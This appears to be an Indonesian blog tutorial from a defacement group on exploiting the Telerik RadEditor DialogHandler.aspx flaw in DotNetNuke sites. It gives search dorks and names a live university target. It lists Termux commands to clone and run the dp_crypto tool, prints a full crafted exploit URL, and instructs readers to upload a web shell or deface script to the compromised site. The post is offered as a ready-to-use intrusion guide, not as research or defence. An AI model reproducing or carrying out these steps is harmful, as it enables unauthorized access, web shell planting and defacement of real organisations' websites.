Alat Dan Bahan:
-Hp (wajib)
-Aplikasi Termux (wajib)
-Script Deface (wajib)
-Shell Backdoor
-Internet (wajib)
Dork:
-DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx
-DesktopModules/Admin/RadEditorProvider/
Note:web yang VULN akan ada tulisan "loading the dialog" tapi walaupun ada tulisan itu tidak menjamin keseluruhanya akan VULN jadi bersabarlah kawan
Exploit:
-/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx
(tambahkan di belakang web)
Oke disini saya juga sudah punya live target yaitu:
-http://vns.hnue.edu.vn
1.Kita
gabungkan web dan Exploit nya seperti ini:
-http://vns.hnue.edu.vn/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx
Kalau ada tulisan "Loading the dialog" berarti VULN
2.
Kita buka Termux di hp kita oke dan masukan scriptnya di bawah ini:
$pkg install git -y
$pkg install pip
$git clone https://github.com/bao7uo/dp_crypto
$cd dp_crypto
$python3 dp_crypto.py k -u (masukkan website targetnya beserta Exploit nya)
$pkg install pip
$git clone https://github.com/bao7uo/dp_crypto
$cd dp_crypto
$python3 dp_crypto.py k -u (masukkan website targetnya beserta Exploit nya)
Script From: Exploit-Db
Contoh seperti gambar dibawah ini:
Kalau sudah langsung saja di klik oke/yes/next di Termux nya.
Kalau sudah akan seperti gambar dibawah ini:
Note:Jika key position di Termux hanya berjalan sebelah kiri saja atau hanya satu berubah-ubah angka/hurufnya maka itu artinya tidak VULN,tapi kalau angka/huruf key position nya dua-duanya berubah maka itu VULN.
3.
Setelah menunggu beberapa saat dan jika website berhasil kita inject maka tampilannya akan seperti gambar dibawah ini:
Lalu kita copy dari http hingga akhir.
Contoh:
http://vns.hnue.edu.vn/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?DialogName=DocumentManager&renderMode=2&Skin=Default&Title=Document%20Manager&dpptn=&isRtl=false&dp=Y2IDLhtcSy5gGwgBVV18F1d1TDQdFBRKEFh1MSJ2ETB/PU9iVS0UVXh1Z15adhMAa2N0LiZ2Wzh9BRRNU2dnMnlxTCMmFAgMF3N9diMSNHV/AFwAZBR3UW4oTV5qZnRZa2JkLRhmYQFoGwhYYgNgdFZ1YjglBBNVJnZLBRgTPDloF0BNegUQQFMSYAVtXBNFa3JgPxZmCilrED5zbmdKO25hQzsIBwwOFG1xMSN2AihnA3EHVwsPSmENfwNiYjJHfXNGMhtLXxNkFH4NeAF8LW1qfiglBQdRJn1hLiIpcTl+AmVOUhQXSnoGTWZ1XDZHaARzfxJlRwRTLgBdVXdkB1Zlfi4eBBdVGHN9MCATcTl+AW1fVAsMVXsBeEFueQ8Ba2FCCBtpWxRSBD5CbmdgBlVlTC4RcSkPGGZLBRgTPDloF0BPegcLTnkBUkV1dTF9Uwd4LiB2X3RoGxREVQIHEG1qZi0IBh9RIH19Lg0ABTB9dG1HVAQUelQoDAFbAxNJYAcPMyZ2ZTdVBQRNVQNoMW51YjsSCylOGGAGKiMTETBgKXFEVXEXSnoGQgVuXClcVQR0LiZ2Wzh9BRRNU2dnMnlxTCMmFAgMF3N1NBEQMAlRdXlFVxR3bFV2Y1hZcj13aGJOPBhiRDh9BhxcVXh8LXsCYnYgBBNAIFh1MRMDKCtQAw5ZVXIAUVMCUkFqXANDUgdjNQ9yRHVlBABBbQNkKW4AYTEWLgNKIQdmMQwHPCJkPmUHYC8Yd2cRQWdiZj1cUlhaNA5aYTJoFD5CbQBgLW5fWDclGxdJIAcHNxMDKCtQAw5ZYAsuTm0QAFpaZhBDY1hwNSEDZjF8AD5jZQFoO2NeXAknBAMMDGNbIxd0KHJkKGFFUhUIYWIrd1lqSykFZXJCFSF3XxpUCxxVenUHc21fAREhFAxAJ31DDyB1DnFlEHlgUgUyYXkRd2duAR8BZmNSLSB2fTBkLQRuYQNac2NcWHEech9xFFt9IxYBNDRrHFwGYQUyYWQdY2VuZjFKYmBsJyB2fTdlLQRdelpjdGBlRAAhBnQMDH1fDyApCndmKlsEbHIHQ2Ere1lrdx8FZllnPiZnQxtnKQReVWVoO2B3egERFBdhEVt9Khd0cQ5lKF9EYBQLQFMCTVtZWwcEZWJGASBnXxpnFwhkZXVnOGBeUAklBnVAF2FydRATPDBQd1N5UhQ6CVYdd0FiZwtcU3JgLCZ2XzRTKj5zbmdKO25hQzgIBh9RIH19Lg==
4.
Setelah di copy kalian paste kan di google chrome dan jika berhasil maka akan ada tempat upload seperti gambar dibawah ini:
Lalu kalian klik/pencet tombol + warna hijau disana atau cari tulisan upload,lalu kalian upload Shell kalian atau script kalian
Note:kalau Shell bisa php dan aspx
Ini contoh punya saya:
Sekian dari saya mohon maaf bila ada kesalahan dan kekurangan terimakasih bagi yang telah membaca salam D-GOD
Best Regard:
INDONESIAN ERROR SYSTEM
Copy web orang :v
ReplyDelete